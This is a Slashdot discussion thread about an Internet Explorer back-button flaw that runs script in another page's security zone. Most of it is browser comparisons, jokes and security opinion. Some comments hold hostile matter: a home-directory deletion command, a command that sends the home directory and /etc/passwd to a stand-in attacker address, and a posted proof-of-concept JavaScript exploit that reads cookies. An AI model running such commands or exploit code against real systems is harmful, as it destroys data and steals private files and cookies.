    "Win treats sysadmins better than users. Mac treats users better than sysadmins. Linux treats everyone like sysadmins."
    1. Re:The more I know about windows... by sasha328 · · Score: 2

      It won't work on the Mac because you don't have C:/ or winmine.exe

      Try modifying the scripts to point to something MacOSXy, maybe it'll work then.

    2. Re:The more I know about windows... by karlm · · Score: 2
      no can do. owned by root or admin. you'll have to enter a root or admin password to do anything damaging.

      Better, but not good enough. It's great that IE isn't actually part of OS X and the default account isn't an Admin (root) account, but there's still plenty of "damage" you could do. fileExec("rm -rf ~/;") sounds pretty good. Now, of course you make nightly backups, so removing all of your files means a loss of only today's work, but it's still a pain in the arse. Oh, and does OS X have mimencode and mailto? It must have equivalent functionality somewhere. How'd you like fileExec("tar -cf - ~/ /etc/passwd | gzip --best | mimencode | mailto -s `ifconfig` blackhat@blackhat.com") I'm pretty sure the password hashes are in shadow on OS X, but the enumeration of users is helpful, as is all of your current user's directory.

      Mac OS X is on the right path, but what the world really needs is good capabilities-based security. Your browser should not even be able to know if you have /bin/rm, much less be able to execute it, unless it asks you to give it an executable file handle to /bin/rm. The days of programs reasonably being assumed to act in the interests of the users are long gone. Security thinking should catch up and treat each program as a separate user with few rights by default. In other words, everything should be sandboxed by default and should have to ask the user for anything outside of the sandbox.

      --
      Copyright Violation:"theft, piracy"::Anti-Trust Violation:"thermonuclear price terrorism"<-Overly dramatic language.
  30. Is there a real exploit here? by Chuck+Chunder · · Score: 5, Insightful

    Even if an executable were encoded in the link would the end user not be simply warned that they are attempting to download an executable, as with any other URL that served them an executable?

    It's only a security hole if delivering the content via the data URL is treated differently than getting it via an http, ftp or javascript one.

    --
    Boffoonery - downloadable Comedy Benefit for Bletchley Park
    1. Re:Is there a real exploit here? by phyxeld · · Score: 3, Informative

      Look at the exploit code.

      See how the script calls an alert() with the contents of a local file from your drive? Thats very very bad.

      If a remote script can read a file off your hard drive, it can then write bits of data into an img tag on the page, passing your stolen information to a remote server (via the image's src element) without your knowledge. Very very bad.

      --
      __
      Choose mnemonic identifiers. If you can't remember what mnemonic means, you've got a problem. - Larry Wall
    2. Re:Is there a real exploit here? by BZ · · Score: 2

      Except data: can't read things off your hard drive...

    3. Re:Is there a real exploit here? by Chuck+Chunder · · Score: 2

      Please look at the post I was replying to which is about an alleged Mozilla exploit involving data: urls, not the IE one in the main story.

      --
      Boffoonery - downloadable Comedy Benefit for Bletchley Park
  31. Now if only all porn site admins would.... by coene · · Score: 5, Funny

    .. do a little something like this:

    <a href="javascript:execFile('file:///c:/winnt/system32/net send * \"HI EVERYBODY IN THE OFFICE! I AM LOOKING AT PORN!\"')">CLICK FOR BOOBIES</a>

  32. Change the hand cursor-shape in 9x's Control Panel by yerricde · · Score: 2, Informative

    I want Mozilla to give me the netscape finger.

    Mozilla gives you the system finger cursor-shape when you :hover over a link. If you want Mozilla to give you the Netscape finger, or even the middle finger, you can select any .cur file in Start > Settings > Control Panel > Mouse > Pointers.

    --
    Will I retire or break 10K?
  33. heh by elmegil · · Score: 5, Funny

    Good thing security is MicroSoft's number one focus now!

    --
    7 November 2006: The day Americans realized corruption and incompetence weren't addressing 11 September 2001
    1. Re:heh by great+throwdini · · Score: 2

      Good thing security is MicroSoft's number one focus now!

      You made a funny. In all seriousness, does anyone have a pointer to Microsoft's summary of its audit activities in the month of February? Did they ever issue a press release trumpeting its accomplishments during the month of intense review?

      I'm not looking to bash, I just want to know what they managed to accomplish. Near as I can tell, the only benefit to me was a series (three?) of Internet Explorer patch roll-ups. Anyone have a fuller clue?

    2. Re:heh by weave · · Score: 2
      Yeah, really. You'd think if they really did a full audit of their code during February, there'd be a lot of new security notices and patches shortly thereafter to fix what they found.

      When's the last time a security bulletin from them was prompted by something other than being forced by some evildoer from the outside discovering it first?

  34. WORK AROUND! by Jace+of+Fuse! · · Score: 2

    Step One: Move the mouse pointer to the toolbar containing the forward and back buttons. Point to any part of the toolbar EXCEPT either the forward or back buttons. Empty areas or other buttons are fine.

    Step Two: Use the mouse button you have configured to bring up the context menus. On most systems this will be the right mouse button and is often referred to as "Right Clicking".

    Step Three: From the context menu select the option CUSTOMIZE...

    Step Four: In the Customize Toolbar window will be two boxes full of items. Use the scrollbar to browse the contents of the right-most box and look for the button that says "BACK". Highlight the "BACK" button item.

    Step Five: FNORD

    Step Six: Press the REMOVE button between the left and right item boxes.

    Step Seven: Press the upper right most button marked "CLOSE".

    Your browser should now be immune to this exploit. Share and Enjoy.

    --

    "Everything you know is wrong. (And stupid.)"

    Moderation Totals: Wrong=2, Stupid=3, Total=5.
  35. Trolling, or just blind stupid? by Anonymous Coward · · Score: 4, Insightful

    First off, had you bothered to do any research, RFC 2397 defines the data: URL scheme--this isn't some Mozilla debug thing, as you foolishly asserted. Second, you haven't actually demonstrated how this behaves differently from a normal URL. If you click http://this.is.a.url/ and the document at the end has a meta refresh to goatse.cx, how is that different from a data: URL (other than the data:URL being easier to spot)? Same deal with a shell script or .exe; it won't autorun any more than if you clicked on a link and got in through HTTP.

    I'm not sure whether you actually believe you've found a vulnerability, or are just trolling for Konqueror; either way, it illustrates the weakness of /. moderation in succumbing to a good line of BS.

  36. First LiveScript, then JavaScript, then ECMAScript by yerricde · · Score: 3, Informative

    I think you're referring to ECMAScript formerly called JavaScript

    First it was LiveScript, then when "Java" became a buzzword, Netscape changed its syntax to resemble that of a brace language (C, Perl, or the Java programming language) and changed its name to JavaScript. "ECMAScript" is the generic name, created when the underlying language (without any specific DOM) was submitted to the European standards body ECMA; "JavaScript" is Sun's trademark licensed to Netscape, reflected in the media type for ECMAScript source code (text/javascript).

    --
    Will I retire or break 10K?
  37. Re:They did act by LinuxGeek · · Score: 2
    Well, they knew about this in November, they just spent the entire month of February 'fixing bugs'. Yet this still exists in a fully patched IE6. Hmmmmm. Not very effective, were they?


    Maybe the "Act" they performed was mostly theatrical.

    --

    Kindness is the language which the deaf can hear and the blind can see. - Mark Twain
  38. One reason I love Opera by Arker · · Score: 5, Informative

    Opera cured that problem quite effectively. Since I started using it as my main browser, I can't remember finding a page where back wouldn't work properly. It ignores scripts that try to take it over, and it tracks documents-in-frames properly too, you can go forward and back independently in different frames on framed pages.

    --
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-
    Friends don't let friends enable ecmascript.
    1. Re:One reason I love Opera by mgkimsal2 · · Score: 2

      Mozilla/NS is *much* worse at this than IE.

    2. Re:One reason I love Opera by ncc74656 · · Score: 2
      I agree, but can't live with the amount of screenspace the toolbars/adbars take up...

      The reason Opera is a non-starter for me is that it's an MDI application. I don't want all my browser windows in one big "box." That it's adware doesn't help things much either (though I could more than likely filter the ads at the proxy server).

      I just snagged a Mozilla binary...last time I tried it was several months ago. It seems to be fast enough (seems about the same as IE), and it has more finely-grained security preferences than IE. (I had turned off JavaScript except for trusted sites because I was tired of pop-ups and pop-unders. In addition to blocking those, it looks like Mozilla can also prevent sites from fscking with the status bar or resizing the browser window.)

      The few problems I've run across with Mozilla so far seem to be fixable. The default navigation buttons are huge and ugly, but the Lo-Fi theme fixes that. There's no Google Toolbar, but the search behavior of the address bar can be fixed so it uses Google instead of Nutscrape.

      I've been using Internet Explorer pretty much since it was introduced nearly seven years ago. The few pre-3.0 advantages that Nutscrape had over IE weren't enough to get me to switch. Since then, IE had pretty much gotten better and better while Nutscrape stagnated. Early Mozilla builds showed promise, but weren't ready for prime time (hey, it's only a beta). With more and more holes being found in IE (especially this latest hole...at least the sample exploit only launched Minesweeper instead of opening goatse.cx or something similarly nasty), I'm beginning to wonder if now might be a good time to make the switch to Mozilla.

      --
      20 January 2017: the End of an Error.
  39. Omniweb --- Semi-Related by Amiasian · · Score: 3, Interesting

    I'm not sure about the other (commercial or open source) browsers. However, I use a Mac OS X Cocoa browser, called Omniweb [http://www.omnigroup.com/products/omniweb/]. It has a feature where the user can stop loading individual parts of a page. For instance, say you're loading a page with 60 images. Normally, you'd click the stop or back button in a browser. In Omniweb, the text would still load - but you could stop loading some of the larger images.

  40. Re:The simple solution by nitehorse · · Score: 2

    All of them are being stripped out? What if you escape them?

    -clee

  41. Works in IE 5.5 by techmuse · · Score: 2

    The exploit also works in IE5.5.

  42. Re:What are the odds... by jesser · · Score: 2

    "Rating: Medium because user interaction is needed"?! What's the chance that the user will hit the back button when they think it will take them back to a porn image gallery, 80%?

    --
    The shareholder is always right.
  43. IE 5 for Mac OS X bug!!! by toupsie · · Score: 5, Funny

    Damn it! I went to the test page and tried all the links with the back button. Not one of them worked. Not a one. There is a bug in the bug when it comes to Mac OS X and Internet Explorer. Once again as a Mac user, I am getting deprived of the same experience that Windows users get with Internet Explorer.

    --
    Strange women lying in ponds distributing swords is no basis for a system of government.
    1. Re:IE 5 for Mac OS X bug!!! by toupsie · · Score: 2

      Bless you! Thanks for thinking about us Mac users!

      --
      Strange women lying in ponds distributing swords is no basis for a system of government.
  44. Important Mac OS X IE v5.1.4 Update!!! by toupsie · · Score: 2
    From Software Update:

    This latest version - version 5.1.4 - resolves all potential security vulnerabilities in previous versions of Internet Explorer 5. This includes vulnerabilities that might have caused Internet Explorer to stop responding or caused a memory problem that compromised the security of the computer.

    However, I rechecked the back button bug that Mac OS X users experience where minesweeper will not launch on the test pages. Mac OS X IE v5.1.4 does not resolve the user experience issue for Mac users.

    --
    Strange women lying in ponds distributing swords is no basis for a system of government.
  45. Yes, I know. by Wee · · Score: 2
    I'm sorry if I can't even be serious about this anymore, but I hope you realize I was making a rather dumb joke.

    Yes,I saw the joke. I liked it too. I just used your post to vent something that's been bugging me for a long time. Your post was the minor imperfection on the beer glass of the world which allowed the seed of my thought to find purchase and rise to the surface as a big festering bubble of disgust. How very Zen. I think I'll go write Haiku...

    Seriously, though, I once had to spend a week testing alternate browsers so that I could develop a test plan to replace IE on the machine in our NOC (after one of them got rooted when an operator was browsing warez and pr0n sites). I'm bitter about IE. And I had a nasty day at work (wrestling with CorporateTime's horrible attempt at an API, if you must know) so I had to vent. And for that I must thank you. I feel much better without all that painful gas pressure.

    -B

    --

    Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.

  46. This is a major one ,, user interaction not needed by rahul_inblue · · Score: 5, Informative

    The flaw can be exploited *without* user interaction ,, use about: and use a body-onload javascript to execute the back button ,, poc html page is attached. u know what this means :P .

    ----cut here---

    Press link and then the backbutton to trigger script.

    Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)


    Run Minesweeper (c:/windows/system32/calc.exe XP, ME etc...)


    Read c:\test.txt (needs to be created)


    Read Google cookie

    // badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
    badUrl = "about: ";
    function execFile(file){
      alert (badUrl);

      s = '';                 // payload is empty as reproduced on this page
      backBug(badUrl,s);
    }
    function readFile(file){
      s = '';                 // payload is empty as reproduced on this page
      backBug(badUrl,s);
    }
    function readCookie(url){
      s = 'alert(document.cookie);close();';   // payload: show the cookie of the document it ends up running in
      backBug(url,s);
    }
    function backBug(url,payload){
      len = history.length;   // history depth before the navigation
      page = document.location;
      // Build a javascript: URL with two branches. On the first pass history.length
      // still equals len, so the else branch is taken; after the user presses back,
      // history.length differs, so a window is opened that document.write()s the
      // payload and history.back() is called again.
      s = "javascript:if (history.length!="+len+") {";
      s+= "open('javascript:document.write(\""+payload+"\")' )";
      s+= ";history.back();} else 'location=\""+url
      s+= "\";document.title=\""+page+"\";';";
      location = s;
    }

    ---cut here---

    --
    _
  47. You have to prioritize these things by The+Silver+Slurper · · Score: 2, Funny

    Is a fix for the back button exploit really as important as something like the following?

    Q310510: Recommended Update Download size: 220 KB, 1 minute

    This update resolves the "Playback and Copy-Protection Issues When You Try to Play the Snow White and the Seven Dwarfs DVD Movie" issue in Windows XP and is discussed in Microsoft Knowledge Base (KB) Article Q310510. Download now to be able to play Disney's "Snow White and the Seven Dwarfs" Platinum Collection DVD.

    For more information about this issue, read Microsoft KB Article Q310510. (This site may be in English.)

  48. Re:hm by Kanon · · Score: 4, Informative
    2) I can disable the pop-under ads on sites I frequent by putting those sites into the "restricted" zone. Mozilla offers me no way to disable the popunders without completely disabling Javascript. (I'd rather have a option for "disable all javascript based popups", but at least IE gives me SOMETHING.)

    Get a newer version of mozilla and go into preferences/advanced/scripts and windows.

    Turn off the "open unrequested windows" tickbox. Bingo. You now have to click a link before the popup/under will open. Sites can't open them for you.

  49. Re:work around by Xenex · · Score: 2

    %systemroot%\system32\winmine.exe

    Paste that into run (in Windows, obviously).

    I see no reason why an exploit couldn't do that.

  50. Stupid is as stupid does. by BCTECH · · Score: 3, Informative

    I have not seen a popup ad in years. I was not vulnerable to the .eml bugs. I laugh at websites that are blank for people like me who have java script turned off. I have always thought that Java Script, captive X etc were the scourge of the internet.

    Ever since we have had the option I have used the built in security functions of IE. Tools/Internet Options/Security

    Turn off everything for your internet zone. Add all your sites that you visit regularly to "Trusted Sites" and enable all the bells and whistles you want.

    If a site breaks because they have not done simple checks to see if you have java script enabled then screw them and move on to a site that is run by someone who has an element of style and thoroughness.

    Here is a wish list I do have for IE though. One power tool I have allows you to toggle images on and off with a click . I would like such a power tool that would enable/disable java script with a click and another to add trusted zones on the fly. If anyone out there has the coding capability I think you may have something.

    1. Re:Stupid is as stupid does. by leighklotz · · Score: 3, Informative

      Unfortunately, you are vulnerable to this one.

      The insidious thing about this bug is that it breaks your security model. When you press back, the page you go back to is run in the security zone of the page you go back from. So, even if you block "everything" in the "Internet Zone", if the next page you visit is in your trusted zone and you press the back button, it will run ActiveX controls or pop up or whatever bells and whistles are allowed on the page you came from.

      Furthermore, note that Internet Explorer error pages (such as a 404 Page Not Found) are automatically in the trusted zone. So, for you to be safe with your current policy, you need to do the following as well:

      1. Avoid the back button from trusted pages
      2. Don't click on broken links or anything else that gets an error page
  51. The problem is: it's a designflaw. by Otis_INF · · Score: 4, Insightful

    Buffer overflows... these are implementation-specific bugs and should be easily patchable. However, MS put a lot of functionality into IE (for the most part because it's bundled) and when you look at the separate parts of all this functionality, you don't see exploitable stuff. However, combining parts of the functionality CAN LEAD to a situation that wasn't foreseen, and perhaps will lead to a vulnerability.

    It's easy to say "Crap!" but it takes a wicked mind to combine the right parts of the functionality of a program to create a hole, a mindset which is obviously not present among the IE designers (but which should be, though).

    As a true microsoftie I more and more begin to realize that the bundling should be undone, so the set of functionality built into the webbrowser is simply focussed on what it should do: rendering pages.

    Using another browser is not the answer however. The only browser that comes close to IE6 is Netscape/Mozilla, however these browsers are also packed with features you'll probably never need but CAN probably be used to create a hole when combined with other functionality in the program.

    --
    Never underestimate the relief of true separation of Religion and State.
  52. read: by leuk_he · · Score: 2
    I thought the disclaimer was kind of funny: "I am not responsible because i say so." MS will blame him for releasing the exploit. As punishment they will not mention his name.


    Disclaimer:
    ===========

    Andreas Sandblad is not responsible for the misuse of the
    information provided in this advisory. The opinions expressed
    are my own and not of any company. In no event shall the author
    be liable for any damages whatsoever arising out of or in
    connection with the use or spread of this advisory. Any use of
    the information is at the user's own risk.
  53. Does not work with NT 4.0, IE 5.0 by harmonica · · Score: 2

    Access denied error message. NT 4.0 with service pack 6, IE 5.00.2014.0216.

  54. Maybe it's a feature? by jeti · · Score: 2

    I've been waiting for commercial browsers to subtly
    manipulate information for quite a while.

    Maybe sites served from Apache will someday load
    0.2s slower than the ones served from IIS.

    Only on Explorer of course.

  55. Re:hm by shakah · · Score: 2, Informative

    This isn't quite the same thing, but you can block individual sites from popping up windows on entry to the site by putting something like the following in your preferences file (user.js):

    user_pref("capability.policy.popupsites.sites", "http://www.morningstar.com/");
    user_pref("capability.policy.popupsites.Window.open", "noAccess");
    user_pref("dom.disable_open_during_load", true);

  56. It's all about the Javascript by Greg+W. · · Score: 2

    I've said this before, but a quick glance through the first few comments at threshold 2 didn't reveal anyone else having said it yet, so....

    TURN OFF JAVASCRIPT, YOU IDIOTS!

    Javascript is the Incarnation of Evil on this plane. It is the Scion of Satan. It is the Bastard of Beelzebub. Javascript blew up the Twin Towers on September 11. Javascript is what killed your goldfish when you were a kid.

    (We now return you to your regularly scheduled "my browser is better than your browser" war.)

    1. Re:It's all about the Javascript by Ziviyr · · Score: 2

      Actually, having ActiveX off kept minesweeper from running here. Could still show me stuff I had, didn't seem able to execute much though.

      --

      Someone set us up the bomb, so shine we are!
  57. MS patch for this already released March 29 2001?? by badzilla · · Score: 2, Informative

    I tried the various POC HTML pieces in this thread and they all trigger my antivirus (F-secure) which sends me off to get Microsoft Security Bulletin MS01-20

    This bulletin does not seem to me to have any relevance to the scripting problem we're talking about. However, the exploit does not work on my version of IE6, even if I tell F-secure to ignore the alert.

    --
    "Don't belong. Never join. Think for yourself. Peace." V.Stone, Microsoft Corporation
  58. Re:So... by frunch · · Score: 2, Funny

    The more important issue here is that this bug eliminates the ability to use the "Forward" button too. If you don't go back, you can't go forward!

    Congrats, MS, on killing two buttons with one bug.

  59. Worse... by allism · · Score: 2, Interesting

    If you clicked the link to read the article, you can't hit the 'back' button to return to slashdot...

  60. I can't remember the last time... by realdpk · · Score: 2

    ..I even USED the back button in my browser. Alt or control-left works for me! Down with mice!

    (yeah, I know, same triggers. ;) )

  61. revised by Jagasian · · Score: 2

    Q: Somebody cracked into my default installation of Red Hat 6.2. What do I do?

    A: Install Debian.

  62. Look at the parent of Chuck's post by jesser · · Score: 2

    Chuck was talking about data: URLs, not this IE hole.

    --
    The shareholder is always right.
  63. Re:Secure Windows by Graspee_Leemoor · · Score: 2

    "install ZoneAlarm [zonealarm.com], and make sure not to give net access to any MS apps "

    Tiny Personal Firewall is vastly superior and completely free for personal use. I combined it with TCPTunnel for Win32 (for port forwarding). The two products work fine together and can easily protect a whole lan if ICS is used under XP or 2000.

    The source is available for the port forwarder. The firewall is ICSA certified.

    graspee

  64. Still more MS security flaws? by Lonath · · Score: 2

    That's surprising. Perhaps someone should document this phenomenon of not being able to throw huge amounts of people at a complex software project late in its development with any expectation of fixing it quickly. :P

    Ya know, I think that they would have been better off if they had spent the last two months assigning everyone a book report on The Mythical Man-Month and then realizing that this change will have to be a permanent course correction instead of a short-term fix.

  65. Any excuse to bash away at Microsoft by Junks+Jerzey · · Score: 2

    Sigh. The response to stories like this is why I've stopped reading Slashdot for the most part. I used to read it every day, and now I go for months at a time without even looking at the front page.

    Yes, there is a security problem in IE. Yes, there have been many such problems in the past. There have also been security problems with browsers for Linux. The discussion goes like this:

    Linux Newbie: Microsoft should be put out of business! They don't care about security! There are hundreds of security holes in Windows and Internet Explorer!

    Level-headed Computer User: But there have been security holes in Linux and software for Linux.

    Linux Newbie: But Linux is a more secure operating system! You can't do as much damage under Linux because of file permissions and other security measures.

    Level-headed Computer User: But we're talking about exploits. By definition an exploit is something that you were never supposed to be able to do in the first place.

    Linux Newbie: Down with Microsoft! Bill Gates sucks!

    1. Re:Any excuse to bash away at Microsoft by Quazion · · Score: 2

      And these are the posts that make me think about quitting reading Slashdot. Just because some people are stupid, it doesn't mean you should be stupid too?

  66. VShield blocks this by blazin · · Score: 2

    I just copied the source onto my machine and tried to access it. McAfee pops up saying something along the lines of "The file that is trying to execute has a variant of the Exploit.something trojan".

    It then gives the option to terminate it or continue. I told it to continue since I wanted to see if patched IE 5.5 is vulnerable.

    I cannot get the window to pop up again, but the scanner console says there was an infected file scanned, and every time I try to copy, rename, move, or create a file with the same contents, the file gets a .vir extension added to it. Changing the name of that file doesn't remove the .vir extension.

  67. In related news... by PhotoGuy · · Score: 2

    In related news, CERN is reporting that "File, Open" is generally considered a huge security risk in all versions of IE.

    --
    Love many, trust a few, do harm to none.
  68. tried it; doesn't work by wazo2k · · Score: 2, Interesting

    I tried it...

    it does work when the page is on my hard drive,
    but it doesn't work when I upload the page to the internet...

    In other words, what the parent posted runs in the correct security zone, no problem there.

  69. Re:This is a major one ,, user interaction not nee by Tony-A · · Score: 2

    Personally I prefer E:\WINNT where D: is the CD-ROM.
    It also messes with some stuff you don't really want running.
    One more degree of separation ;)

  70. Trustworthy Computing by Tony-A · · Score: 2

    Microsoft Windows XS
    ( for Xtra Secure ;)